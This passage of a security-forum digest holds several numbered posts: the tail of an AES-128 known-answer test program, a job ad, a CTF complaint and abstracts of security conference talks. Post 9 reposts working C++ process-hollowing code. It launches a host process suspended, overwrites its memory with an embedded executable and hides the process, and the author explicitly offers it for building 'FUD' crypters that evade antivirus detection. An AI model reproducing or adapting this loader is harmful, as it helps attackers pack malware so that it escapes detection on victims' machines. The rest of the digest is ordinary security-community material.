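        for (int j = 0; j < 4; j++) rk[i + j] = rk[i - 16 + j] ^ t[j];
    }
}

/* One block; state is held column-major as s[4*col + row], the same order as the input bytes */
static void aes128_encrypt_block(const uint8_t rk[176], const uint8_t in[16], uint8_t out[16])
{
    uint8_t s[16];
    memcpy(s, in, 16);
    for (int i = 0; i < 16; i++) s[i] ^= rk[i];
    for (int round = 1; round <= 10; round++) {
        uint8_t t[16];
        /* SubBytes and ShiftRows together: row r of column c comes from column (c + r) mod 4 */
        for (int c = 0; c < 4; c++)
            for (int r = 0; r < 4; r++)
                t[4 * c + r] = kat_sbox[s[4 * ((c + r) & 3) + r]];
        if (round != 10) {                               /* MixColumns, skipped in the last round */
            for (int c = 0; c < 4; c++) {
                uint8_t a0 = t[4*c], a1 = t[4*c+1], a2 = t[4*c+2], a3 = t[4*c+3];
                s[4*c]   = gmul(a0, 2) ^ gmul(a1, 3) ^ a2 ^ a3;
                s[4*c+1] = a0 ^ gmul(a1, 2) ^ gmul(a2, 3) ^ a3;
                s[4*c+2] = a0 ^ a1 ^ gmul(a2, 2) ^ gmul(a3, 3);
                s[4*c+3] = gmul(a0, 3) ^ a1 ^ a2 ^ gmul(a3, 2);
            }
        } else {
            memcpy(s, t, 16);
        }
        for (int i = 0; i < 16; i++) s[i] ^= rk[16 * round + i];
    }
    memcpy(out, s, 16);
}

/* FIPS-197 Appendix C.1 known-answer test; returns 1 when the cipher agrees with the standard */
int aes128_kat(void)
{
    static const uint8_t key[16]    = { 0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,
                                        0x08,0x09,0x0a,0x0b,0x0c,0x0d,0x0e,0x0f };
    static const uint8_t pt[16]     = { 0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,
                                        0x88,0x99,0xaa,0xbb,0xcc,0xdd,0xee,0xff };
    static const uint8_t ct_ref[16] = { 0x69,0xc4,0xe0,0xd8,0x6a,0x7b,0x04,0x30,
                                        0xd8,0xcd,0xb7,0x80,0x70,0xb4,0xc5,0x5a };
    uint8_t rk[176], ct[16];
    build_sbox();
    expand_key128(key, rk);
    aes128_encrypt_block(rk, pt, ct);
    return memcmp(ct, ct_ref, 16) == 0;
}

int main(void)
{
    printf("S-box vs FIPS-197: %s\n", sbox_matches_spec() ? "ok" : "MISMATCH");
    printf("AES-128 C.1 vector: %s\n", aes128_kat() ? "PASS" : "FAIL");
    return aes128_kat() ? 0 : 1;
}
```

    Compile with `cc -std=c99 kat.c && ./a.out`. The same two checks can be pointed at any AES implementation: feed it the C.1 key and plaintext and compare the 16 output bytes; a table-generation slip such as the one the post patches by hand will fail the vector even when encrypt/decrypt round-trips look fine.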
  9. [c++] Run Program From Memory And Not File
    by Galco

    #include <windows.h>
    #include <stdlib.h>
    #include <string.h>

    // Referenced by the post but not included in it: hideProcess(), startHook() and
    // secAttrib (a SECURITY_ATTRIBUTES passed to CreateProcess) are the author's own helpers.

    void RunFromMemory(char* pImage, char* pPath)
    {
        DWORD dwWritten = 0;
        DWORD dwHeader = 0;
        DWORD dwImageSize = 0;
        DWORD dwSectionCount = 0;
        DWORD dwSectionSize = 0;
        DWORD firstSection = 0;
        DWORD previousProtection = 0;
        DWORD jmpSize = 0;

        IMAGE_NT_HEADERS INH;
        IMAGE_DOS_HEADER IDH;
        IMAGE_SECTION_HEADER Sections[1000];
        PROCESS_INFORMATION peProcessInformation;
        STARTUPINFO peStartUpInformation;
        CONTEXT pContext;

        char* pMemory;
        char* pFile;

        // parse the DOS and NT headers of the raw (file-layout) image
        memcpy(&IDH, pImage, sizeof(IDH));
        memcpy(&INH, (void*)((DWORD)pImage + IDH.e_lfanew), sizeof(INH));
        dwImageSize = INH.OptionalHeader.SizeOfImage;

        // build the section-aligned (memory-layout) copy locally
        pMemory = (char*)malloc(dwImageSize);
        memset(pMemory, 0, dwImageSize);
        pFile = pMemory;

        dwHeader = INH.OptionalHeader.SizeOfHeaders;
        firstSection = (DWORD)(((DWORD)pImage + IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
        memcpy(Sections, (char*)(firstSection), sizeof(IMAGE_SECTION_HEADER) * INH.FileHeader.NumberOfSections);

        // headers are copied as-is, then rounded up to SectionAlignment
        memcpy(pFile, pImage, dwHeader);
        if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment) == 0) {
            jmpSize = INH.OptionalHeader.SizeOfHeaders;
        } else {
            jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment;
            jmpSize += 1;
            jmpSize *= INH.OptionalHeader.SectionAlignment;
        }
        pFile = (char*)((DWORD)pFile + jmpSize);

        // copy each section's raw data; sections are placed back to back using the aligned
        // VirtualSize, so this assumes they are contiguous (VirtualAddress is never consulted)
        for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++) {
            jmpSize = 0;
            dwSectionSize = Sections[dwSectionCount].SizeOfRawData;
            memcpy(pFile, (char*)(pImage + Sections[dwSectionCount].PointerToRawData), dwSectionSize);
            if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment) == 0) {
                jmpSize = Sections[dwSectionCount].Misc.VirtualSize;
            } else {
                jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment;
                jmpSize += 1;
                jmpSize *= INH.OptionalHeader.SectionAlignment;
            }
            pFile = (char*)((DWORD)pFile + jmpSize);
        }

        memset(&peStartUpInformation, 0, sizeof(STARTUPINFO));
        memset(&peProcessInformation, 0, sizeof(PROCESS_INFORMATION));
        memset(&pContext, 0, sizeof(CONTEXT));
        peStartUpInformation.cb = sizeof(peStartUpInformation);

        // start the host executable suspended and overwrite its image with the one built above
        if(CreateProcess(NULL, pPath, &secAttrib, NULL, false, CREATE_SUSPENDED, NULL, NULL, &peStartUpInformation, &peProcessInformation)) {
            hideProcess(peProcessInformation.dwProcessId);
            startHook(peProcessInformation.hProcess);

            pContext.ContextFlags = CONTEXT_FULL;
            GetThreadContext(peProcessInformation.hThread, &pContext);

            VirtualProtectEx(peProcessInformation.hProcess, (void*)((DWORD)INH.OptionalHeader.ImageBase), dwImageSize, PAGE_EXECUTE_READWRITE, &previousProtection);
            WriteProcessMemory(peProcessInformation.hProcess, (void*)((DWORD)INH.OptionalHeader.ImageBase), pMemory, dwImageSize, &dwWritten);
            // at process start EBX points at the PEB; PEB+8 is ImageBaseAddress
            WriteProcessMemory(peProcessInformation.hProcess, (void*)((DWORD)pContext.Ebx + 8), &INH.OptionalHeader.ImageBase, 4, &dwWritten);
            // EAX holds the address the suspended thread will jump to on resume
            pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint;
            SetThreadContext(peProcessInformation.hThread, &pContext);
            VirtualProtectEx(peProcessInformation.hProcess, (void*)((DWORD)INH.OptionalHeader.ImageBase), dwImageSize, previousProtection, 0);
            ResumeThread(peProcessInformation.hThread);
        }
        free(pMemory);
    }

    This function will run a process based on its memory instead of running a process from a file. Meaning, you can use this in crypters to have FUD runtime.

    You can basically load an exe as a resource into your code and run it as a process like this:

    int main(int argc, char* argv[])
    {
        HGLOBAL hResData;
        HRSRC hResInfo;
        void *pvRes;
        DWORD dwSize;
        char* lpMemory;
        HMODULE hModule = GetModuleHandle(NULL);

        // the payload executable is embedded as a resource of custom type "EXE" with id IDD_EXE1
        if(((hResInfo = FindResource(hModule, MAKEINTRESOURCE(IDD_EXE1), "EXE")) != NULL) &&
           ((hResData = LoadResource(hModule, hResInfo)) != NULL) &&
           ((pvRes = LockResource(hResData)) != NULL)) {
            dwSize = SizeofResource(hModule, hResInfo);
            lpMemory = (char*)malloc(dwSize);
            memset(lpMemory, 0, dwSize);
            memcpy(lpMemory, pvRes, dwSize);
            // the current executable (argv[0]) is used as the host process
            RunFromMemory(lpMemory, argv[0]);
            free(lpMemory);
        }
        return 0;
    }

    The program running the process must have the same image base or else it will not work.

    Source: [c++] Run Program From Memory And Not File - Professional Code - rohitab.com - Forums
  10. Incident Management Sr. Advisor
Bucharest, Romania
We are currently looking for an Incident Management Sr. Advisor that will be part of Dell's internal security team.
Responsibilities:
• Respond to critical computer security incidents by collecting, analyzing and preserving digital evidence
• Assemble and coordinate with technical teams and third-party vendors to resolve incidents as quickly and efficiently as possible
• Communicate status of response, resolution and final root cause analysis to the appropriate stakeholders
• Ensure that all incidents are recorded and tracked to meet audit and legal requirements
• Conduct root cause analysis to identify gaps and recommendations ultimately remediating risks
• Communicate effectively with representatives of the Lines of Business, technology specialists, and vendors
• Gather forensic evidence for disciplinary action or criminal investigation
• Partner with all business lines to investigate internal code of conduct, fraud and other investigations as instructed by the CISO
• Conduct advanced computer and network forensic investigation functions relating to various forms of electronic fraud, identity theft, e-commerce fraud, computer intrusion, theft of information, denial of service, multi-national organized electronic criminal groups, as well as financial fraud investigations
• Perform other essential duties as assigned
• Some basic system administration duties
• Vendor communications for technical support where required
Qualifications:
Requirements:
• 5+ years' experience in IT industry including at least 2 from the Information Security sector with a focus on Incident Response
• Emerging information security technologies and development methodologies
• UNIX, Linux, and Microsoft operating systems
• Security software and tools
• PCI compliance
• Superior communication, organization, and interpersonal skills and a demonstrated effectiveness in a customer facing role.
Company Description
With more than 100,000 team members globally, we promote an environment that is rooted in the entrepreneurial spirit in which the company was founded. Dell's team members are committed to serving our communities, regularly volunteering for over 1,500 non-profit organizations. The company has also received many accolades from employer of choice to energy conservation. Our team members follow an open approach to technology innovation and believe that technology is essential for human success.
Why work with us?
- Life at Dell means collaborating with dedicated professionals with a passion for technology.
- When we see something that could be improved, we get to work inventing the solution.
- Our people demonstrate our winning culture through positive and meaningful relationships.
- We invest in our people and offer a series of programs that enables them to pursue a career that fulfills their potential.
- Our team members' health and wellness is our priority as well as rewarding them for their hard work.
Link: https://dell.referrals.selectminds.com/jobs/security-analysis-sr-advisor-39919?et=FvAn1Ukf
Or send me your CV if you are interested and I will pass it on.
  11. In general, at CTFs, absurd things show up depending on who makes the challenge:
- If he likes anime, he puts in some text and you're supposed to figure out which character from that anime it refers to
- If he likes Sasha Grey, he puts in an "Aa oo aaa oo uuuuuu" and you have to figure out the name of the film (just kidding)
- If he gets the urge to set a bit at position 7 in an image, you have to figure out the idea he had while he was high
- If he wants to build the Fibonacci sequence out of the number of pixels in an image, you have to figure that out too
Anyway, I think you get the idea. That's what I don't like, and I think many others don't like it either: solving a STUPID idea that has nothing at all to do with the technique or the skills of the competitors. Will there be challenges like that?
  12. Dropping Docs On Darknets: How People Got Caught Adrian Crenshaw ShowMeCon 2014 ShowMeCon 2014 - ShowMeCon Hacking Conference St. Louis Missouri Most of you have probably used Tor before, but I2P may be unfamiliar. Both are anonymization networks that allow people to obfuscate where their traffic is coming from, and also host services (web sites for example) without it being tied back to them. This talk will give an overview of both, but will focus on real world stories of how people were deanonymized. Example cases like Eldo Kim & the Harvard Bomb Threat, Hector Xavier Monsegur (Sabu)/Jeremy Hammond (sup_g) & LulzSec, Freedom Hosting & Eric Eoin Marques and finally Ross William Ulbricht/“Dread Pirate Roberts” of the SilkRoad, will be used to explain how people have been caught and how it could have been avoided. Bio: Adrian Crenshaw has worked in the IT industry for the last fifteen years. He runs the information security website Irongeek.com, which specializes in videos and articles that illustrate how to use various pen-testing and security tools. He did the cert chase for a while (MCSE NT 4, CNE, A+, Network+, i-Net+) but stopped once he had to start paying for the tests himself. He holds a Master of Science in Security Informatics and is also one of the co-founders of Derbycon. Sursa: Dropping Docs On Darknets: How People Got Caught - Adrian Crenshaw (ShowMeCon 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  13. Thinking Outside The (Sand)Box Kyle Adams ShowMeCon 2014 ShowMeCon 2014 - ShowMeCon Hacking Conference St. Louis Missouri Incorporating sandboxing and heuristic-based malware detection to security solutions is the new black. Unfortunately, malware writers know this too and are designing their exploits to only run once clearing any sandboxes. If they can avoid getting analyzed and detected as malware, they will also avoid having a signature written and published. This seems like bad news for malware protection, but maybe not. It’s possible to trick evasive malware into thinking it’s continually running in a sandbox (even though it’s not) so it never executes its payload. This inoculates targeted machines from malware designed to evade sandbox analysis. My presentation will demonstrate some of the techniques modern malware uses to determine if it is running in a sandbox or being analyzed. I will also share deceptive techniques available to anyone, which can be used to inoculate a machine from being infected by these types of attacks. Thinking Outside the [sand]box. No antivirus necessary. Bio: Kyle Adams has been involved with security since a very early age. Self-taught, he learned the basics of hacking and security defense strategies long before entering the professional world. Early on, much of his professional focus has been on web security threats like SQLi, XSS, CSRF, etc… but more recently he has started researching and working on products to defend against malware based threats. Kyle helped build and design the first commercial security solution based on deception and misinformation, evolving the concept of honeypot technology from a purely academic endeavor to a realistic intrusion prevention strategy (Junos Web App Secure, formerly Mykonos). He is now working on introducing similar deception techniques as a detection and prevention methodology into the malware space. 
Sursa: Thinking Outside The (Sand)Box - Kyle Adams (ShowMeCon 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  14. Bypassing EMET 4.1 Jared DeMott @jareddemott BSides Chicago 2014 The goal of this study is to gauge how difficult it is to bypass the protections offered by EMET, a popular Microsoft zero-day prevention capability. We initially focused on just the ROP protections, but later expanded the study to include a real world example. We were able to bypass EMET’s protections in example code and with a real world browser exploit. The primary novel elements in our research are: Deep study regarding the ROP protections, using example applications to show how to bypass each of the five ROP checks in a generic manner. Detailed real world example showing how to defeat all relevant protections. Look for a new technique to bypass the stack pivot protection, shellcode complete with an EAF bypass, and more. These bypasses leverage generic limitations, and are not easily repaired. The impact of this study shows that technologies that operate on the same plane of execution as potentially malicious code offer little lasting protection. This is true of EMET and other similar userland protections. Sursa: Bypassing EMET 4.1 - Jared DeMott - @jareddemott (BSides Chicago 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  15. The TrueCrypt audit- How it happened and what we found — Kenneth White Circle City Con 2014 Circle City Con Indy's First Hackercon Abstract: TrueCrypt is an open source file and whole disk encryption software package that runs on Windows, Macs, and Linux. It has been downloaded nearly 30 million times, and is one of the most popular security tools used by journalists, human rights activists, and countless organizations around the globe. In the 10 years since its original release by an anonymous development team, however, there had never been a formal cryptanalysis and security audit of the software. This presentation is about how the TrueCrypt Audit Project came to pass and how some of the best security minds, cryptographic engineers and privacy advocates in the world came together to successfully conduct a public, crowd-funded, open technical audit of this software. Details of our findings and the many lessons learned along the way will be presented. Any and all questions will be answered! Sursa: The TrueCrypt audit- How it happened and what we found — Kenneth White (Circle City Con 2014 Videos) (Hacking Illustrated Series InfoSec Tutorial Videos)
  16. Pentesting Layers 2 and 3 Kevin Gennuso and Eric Mikulas Lower level network protocols have been around for decades and haven't changed much in that time. A number of tools to exploit weaknesses in those protocols have been released over the years, and those haven't changed much either. What has changed is the hardware. Routers used to be bulky, expensive, and proprietary. Now they are small, cheap, and open source. What better way is there to attack network gear than with another piece of network gear? This presentation will focus on layer 2 and layer 3 protocols, their weaknesses, and how to protect against exploitation. We'll revisit tools such as hping, Nemesis, Yersinia, and Loki and show how they can be used to attack vulnerable networks. Finally, we'll demonstrate our ports of these tools for use on routers that run OpenWRT. Kevin is a security testing manager and part time packet herder. He has over 17 years of experience in information security and network architecture, and has done work for a number of organizations ranging from dot-com era startups to large financial institutions. Eric is a software developer and pre-"maker" maker. He has been writing code and wielding a soldering iron since second grade. He has over 10 years of experience as a developer and has worked for a variety of companies both as a full-time employee and independent contractor. Sursa: Pentesting Layers 2 and 3 - Kevin Gennuso and Eric Mikulas Bsides Cleveland 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
  17. Attacking and Defending Full Disk Encryption Tom Kopchak One of your company’s laptops was just stolen. You know that there was sensitive information on the machine. You also know that full disk encryption was deployed. Is your data safe? Can you prove it? Many organizations are flocking to full disk encryption solutions as a solution to their data security requirements. Unfortunately, many of these installations view the deployment of full disk encryption as a panacea for any and all security concerns for their laptop fleets. All too often, these systems are not properly configured and adequately tested. In this talk, Tom will analyze the challenges associated with attacking and defending systems protected with full disk encryption. Many of the examples provided will draw from Tom's personal experience, including several scenarios where a fully encrypted and powered down system was fully compromised as part of a penetration test. Tom Kopchak is a Senior Security Engineer at Hurricane Labs, an Information Security Firm in Cleveland, Ohio. Tom is an alum of the Rochester Institute of Technology, with a background in Computing Security and Information Security (MS) and Applied Networking and System Administration (BS). Tom’s passion for information security stems from his experiences in the Collegiate Cyber Defense Competition. His research areas include computer forensics and data storage technologies. When he is not working with computers, Tom enjoys composing, music improvisation (Acts of Music), and playing both the piano and organ. Sursa: Attacking and Defending Full Disk Encryption - Tom Kopchak Bsides Cleveland 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
  18. Nmap Class for Hackers For Charity
This is the Nmap class the Kentuckiana ISSA put on to support Hackers For Charity. Speakers include Jeremy Druin @webpwnized, Martin Bos @purehate_ and me @irongeek_adc. If you like the videos, please consider donating to Hackers For Charity.
Nmap Class HFC Louisville ISSA Intro
Nmap Class HFC Louisville ISSA TCP IP And Basics Of Nmap Part 1
Nmap Class HFC Louisville ISSA TCP IP And Basics Of Nmap Part 2
Nmap Class HFC Louisville ISSA OS And Service Fingerprinting Part 1
Nmap Class HFC Louisville ISSA Kicking Ass With Nmap
Nmap Class HFC Louisville ISSA Closing
Sursa: Nmap Class for Hackers For Charity - Louisville ISSA (Hacking Illustrated Series InfoSec Tutorial Videos)
  19. Introduction to hacking with PowerShell - Scott Busby Sursa: Introduction to hacking with PowerShell - Scott Busby (BSides Huntsville 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  20. HTTPS: Now You See Me - Tim Mullican Sursa: HTTPS: Now You See Me - Tim Mullican (BSides Huntsville 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  21. 3D Printing for Work and Fun Mirabela Rusu Notacon 11 Sursa: 3D Printing for Work and Fun (temp title) - Mirabela Rusu Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)
  22. Nindroid: Pentesting Apps for your Android device Michael Palumbo Notacon 11 Synopsis We explore the different “apps” available for the android platform that one can use for Local Area Network (LAN) pen testing and mischief. We will try to cover both the well known and newly available android applications for basic hacking needs and have a few laughs along the way. Bio Michael is a 31 year old computer researcher. Michael focuses his projects depending upon what his interest may be that week. Sursa: Nindroid: Pentesting Apps for your Android device - Michael Palumbo Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)
  23. Pwning the POS! Mick Douglas Notacon 11 Synopsis Everybody’s talking about the Target breach. However, there’s lots wrong with the retail space… and it’s been this way for quite some time! Focusing on Point of Sale (POS) systems, this talk will show you how exploit-friendly the POS ecosystem really is, and how you can help fix things. Bio Mick likes to hack stuff. Of late, this means embedded systems. When he’s not “geeking it up” he goes on hikes and stuff to get away from das Blinkenlights. Sursa: Pwning the POS! - Mick Douglas Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)
  24. Wireless Mesh Protocols Alex Kot Notacon 11 Synopsis I plan to explain different ad-hoc mesh protocols and the difference between them. I also plan to go in depth with a decentralized approach called Better Approach to Mobile Ad-Hoc Networking (B.A.T.M.A.N.) that will be beneficial in a society absent of net neutrality. Bio IT specialist that currently works at a credit union. Fond of open source software and a hobbyist of all technologies. I am an enthusiast for embedded open source router firmware as you can see on my youtube channel. Sursa: Wireless Mesh Protocols - Alex Kot Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)